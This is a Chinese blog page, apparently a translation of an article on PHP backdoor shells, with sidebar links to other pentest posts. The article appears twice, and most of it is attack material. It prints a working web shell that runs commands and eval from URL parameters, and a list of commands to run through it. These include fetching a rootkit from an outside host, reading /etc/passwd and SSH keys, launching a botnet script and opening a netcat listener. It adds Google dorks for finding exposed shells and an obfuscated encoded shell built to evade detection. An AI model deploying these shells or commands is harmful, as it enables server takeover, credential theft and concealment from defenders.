- 浏览: 287951 次
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
原文地址:http://resources.infosecinstitute.com/checking-out-backdoor-shells/
一些上传web shell的方法
1. 本地文件包含漏洞-攻击者可以通过文件夹遍历特性
2. 远程命令执行或命令注入-如果网站接收额外的字符串,输入的字符串作为web服务器上执行命令的参数
3. SQLi-攻击者活动web管理员的username/password后,他可以使用管理权限来访问管理面板,并且可以上传后门
4. sniff
5. 暴力破解-暴力破解FTP/SSH来获得访问
6. 跨站脚本
7. 社会工程
8. 远程文件包含
本文我们将讨论PHP后门:
下面代码运行攻击者执行*nix命令:
保存代码为bb.php,上传到web服务器,我们需要在末尾添加?shell=来执行类似下面的命令
现在,开发者在后门shell中添加了许多特性。例如r57, c99, 和 Ani-Shell后门。一些后门拥有邮箱bombers,回连,文件上传/下载器,mysql dumper,运行sql语句,web fuzzer,端口扫描等
未受保护的后门可以轻松的由Google dork找到:inurl:r57.php, intitle: MagicCoder | Version X70.01, inurl:c99.php, inurl:r00t.php, inurl:mma.php等。
一些一些后门可以被发现所有有些攻击者使用PHP编码器。有一个新的PHP编码器叫Carbylamine可以使C99和r57不会轻易被发现。Carbylamine很简单。php carbylamine.php <backdoor file to encode> <output of the file>
例如,编码bb.php,命名为encode.php:
encoded.php的样品:
查找/删除后门
一些上传web shell的方法
1. 本地文件包含漏洞-攻击者可以通过文件夹遍历特性
2. 远程命令执行或命令注入-如果网站接收额外的字符串,输入的字符串作为web服务器上执行命令的参数
3. SQLi-攻击者活动web管理员的username/password后,他可以使用管理权限来访问管理面板,并且可以上传后门
4. sniff
5. 暴力破解-暴力破解FTP/SSH来获得访问
6. 跨站脚本
7. 社会工程
8. 远程文件包含
本文我们将讨论PHP后门:
下面代码运行攻击者执行*nix命令:
<?php if(isset($_GET['shell'])) echo("<pre>".shell_exec($_GET['shell']." &")."</pre>"); if(isset($_GET['php'])) echo(eval(stripcslashes($_GET['php']))); if(isset($_GET['echo'])) echo($_GET['echo']); ?>
保存代码为bb.php,上传到web服务器,我们需要在末尾添加?shell=来执行类似下面的命令
uname -a cat /etc/issue wget www.whateversite.com/rootkit.pl cat /etc/passwd cat /var/www/config.inc find / -name netcat ifconfig | grep eth0 perl botnet.pl ls -la ps aux | grep root cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat /proc/self/environ find / -perm -1000 -type d 2>/dev/null find / -name perl* find / -name python* find / -name gcc* find / -name cc perl -v python -v ruby -v gcc -v nc -lvp 1337
现在,开发者在后门shell中添加了许多特性。例如r57, c99, 和 Ani-Shell后门。一些后门拥有邮箱bombers,回连,文件上传/下载器,mysql dumper,运行sql语句,web fuzzer,端口扫描等
未受保护的后门可以轻松的由Google dork找到:inurl:r57.php, intitle: MagicCoder | Version X70.01, inurl:c99.php, inurl:r00t.php, inurl:mma.php等。
一些一些后门可以被发现所有有些攻击者使用PHP编码器。有一个新的PHP编码器叫Carbylamine可以使C99和r57不会轻易被发现。Carbylamine很简单。php carbylamine.php <backdoor file to encode> <output of the file>
例如,编码bb.php,命名为encode.php:
php carbylamine.php bb.php encoded.php
encoded.php的样品:
<?php function KJnPCP($XZK) { $XZK=gzinflate(base64_decode($XZK)); for($i=0;$i<strlen($XZK);$i++) { $XZK[$i] = chr(ord($XZK[$i])-1); } return $XZK; }eval(KJnPCP("U1QEAm4gzkrXzCopSSvVVE3wcAuN0SjJTMvN1YjT0lJMS8ks0FS2LSxOs1fWBwsnpFWmpaAp1FdWVFfW0le2NQAr1LLBZmhhZiHCyLTypFzNktLirMKUktwkoDElaMqwmwHSizAEVdCG28GeGwA=")); ?>
查找/删除后门
[color=blue]grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval) *(" /var/www[/color]
发表评论
-
linux 安装scrapy
2015-09-07 13:06 602由于scrapy对python3支持不是很好,所以使用pyth ... -
nginx reverse proxy cofinguration
2015-08-28 15:18 417based on our case, we need to h ... -
wpscan
2015-08-01 10:39 435https://www.digitalocean.com/co ... -
[转]Tunneling Data and Commands Over DNS to Bypass Firewalls
2015-07-13 20:44 482https://zeltser.com/c2-dns-tunn ... -
arachni-web-ui使用
2015-06-10 01:04 2146最近在玩儿arachni,想试试arachni-ui-web, ... -
HACKING NODEJS AND MONGODB
2015-06-04 23:52 342http://blog.websecurify.com/201 ... -
php object inject
2015-05-29 00:45 339解释: http://securitycafe.ro/2015 ... -
[转]Forcing XXE Reflection through Server Error Messages
2015-05-19 01:10 453原文地址:https://blog.netspi.com/fo ... -
CVE-2011-2461
2015-03-31 01:19 430http://blog.nibblesec.org/2015/ ... -
[译]从配置错误的web server中dump git数据
2015-03-26 01:07 583原文地址:https://blog.netspi.com/du ... -
[译]解密MSSQL密码
2015-03-26 00:43 2876原文地址: https://blog.ne ... -
自动化Man-in-the-Middle SSHv2攻击
2015-03-18 01:26 1043参考:http://www.david-guembel.de/ ... -
[转]Microsoft Access sqli
2015-03-18 00:57 437https://milo2012.wordpress.com/ ... -
[转]sqlmap注入Microsoft Access
2015-03-18 00:49 1593https://github.com/sqlmapprojec ... -
crossdomain.xml
2015-03-12 01:23 671参考: https://hackerone.com/repor ... -
[译]使用wireshark解密TLS浏览器流量
2015-03-12 00:57 4126原文地址:https://jimshaver.net/2015 ... -
xxe方法
2015-02-01 18:32 849原文地址:http://www.christian-schne ... -
owasp zed--Web Sockets
2015-01-31 01:16 644http://digi.ninja/blog/zap_web_ ... -
memcached
2015-01-25 01:56 0http://www.sensepost.com/blog/4 ... -
[译]linux使用软连接读取本地文件
2015-01-25 00:28 1973原文地址:http://josipfranjkovic.blo ...
相关推荐
### Linux下查找后门程序的方法及Shell脚本详解 #### 一、背景介绍 随着网络安全威胁的日益增多,Linux系统作为服务器领域的主流操作系统之一,其安全性尤为重要。后门程序是黑客为了保持对受害主机的长期控制,而...
主要介绍了简单的Linux查找后门思路和shell脚本分享,本文的方法相对简单,提了一个思路和简单的Shell实现脚本,需要的朋友可以参考下
**多线程Shell资源扫描器**是一种用于网络安全检测的工具,尤其关注于寻找服务器或网络设备中的潜在**Shell后门**。Shell后门通常是指黑客植入的一种恶意代码,允许他们在未经授权的情况下远程控制受害系统,执行...
- vi的基本操作包括移动光标、删除文本、复制粘贴、查找替换等。 3. **Shell编程**: - Shell程序主要由命令、变量、控制结构(如if-else、for循环)和函数组成。 - 在实验中,学生需要编写一个名为`mycal`的...
2. **扫描后缀.txt** - 这个文件可能包含了一组常见的文件扩展名,用于配置收割机进行特定类型的文件扫描,例如查找网络上易受攻击的Web服务器的特定类型文件。 3. **使用说明.txt** - 提供了关于如何使用收割机工具...
在网络安全领域,"不进后台拿shell"通常指的是在攻击过程中不通过常规的后门程序或者后台服务,而是采用其他手段获取目标系统的命令执行权限,从而实现远程控制。这种技术通常用于避开系统的安全检测机制,使得攻击...
Web Shell,通常被称为Web后门,是Web安全领域的一个重要概念。它是一种恶意代码,被黑客植入目标Web服务器上,以便远程控制和管理服务器。Web Shell的用途广泛,包括读取、写入、执行文件,管理系统,甚至可以...
这款工具主要用于合法的服务器管理和攻防后门安全测试,严禁用于非法活动。RMI是一种Java平台上的机制,允许在不同的Java虚拟机之间进行远程对象的方法调用,仿佛这些对象就在本地一样。 RMI的工作原理如下: 1. *...
4. **安装后门**:植入持久性的恶意代码,以便日后随时访问。 5. **加密勒索**:对重要数据进行加密,然后要求赎金以解锁。 对于开发人员来说,防止此类攻击的关键在于遵循最佳安全实践,如: 1. **参数化查询**:...
PHP后门木马扫描工具的工作原理通常是遍历指定目录下的所有PHP文件,然后对每个文件进行深度分析,查找可疑的函数调用和模式。例如,它会检查是否存在以下常见的危险函数: 1. `eval()`: 可以执行字符串中的PHP代码...
WEB Shell,也称为Web后门,是一种在Web服务器上植入的恶意脚本,允许攻击者通过Web接口远程控制服务器。ASP(Active Server Pages)是微软开发的一种服务器端脚本语言,常用于构建动态网页。因此,ASP Web Shell是...
PuTTY是一款广受欢迎的开源SSH(Secure SHell)客户端,主要用作远程登录工具,尤其在Windows操作系统上被广泛使用。SSH是一种网络协议,用于安全地远程登录到服务器,执行命令行操作,传输文件等。PuTTY提供了...
这通常是指使用自动化工具(如Nmap、masscan或 sublist3r)来查找并列举出一个或多个目标域下的所有子域名。这样的扫描有助于发现潜在的未公开服务、隐藏的网络资源,以及可能存在的安全漏洞。 接下来是"拿shell",...
本段文字主要涉及的是PHP后门技术,特别是PHP小马(PHP Web Shell)的使用和制作。PHP小马是一种可以远程控制服务器的恶意代码,它通过Web界面执行服务器命令,通常作为攻击者获取服务器权限和控制的后门工具。 ...
例如,通过使用Web应用扫描器来查找潜在的后门,或者通过日志分析来识别异常的HTTP请求模式。一旦发现疑似感染,应立即断开网络连接,备份重要数据,并使用专业工具进行清理。 总的来说,Gel4y-Mini-Shell-Backdoor...
- **恶意活动**:黑客可能会植入PHP反向Shell作为后门,长期控制目标服务器。 **安全防范** 为了防止PHP反向Shell的滥用,应采取以下措施: 1. **代码审查**:定期进行代码审计,查找不安全的函数使用。 2. **...
SSH(Secure Shell)是网络上广泛使用的安全协议,主要用于加密网络服务,如远程登录、文件传输等。SSH Multiplexing允许在一个已建立的SSH连接上承载多个会话,这样可以减少网络延迟,提高效率,并且在某些情况下,...
1. 定期检查和审计代码库,查找可疑的代码模式。 2. 使用专业的代码分析工具来检测潜在的安全漏洞。 3. 对所有输入进行严格的过滤和验证,避免执行未经允许的系统命令。 4. 限制Web服务器的权限,确保Web应用程序...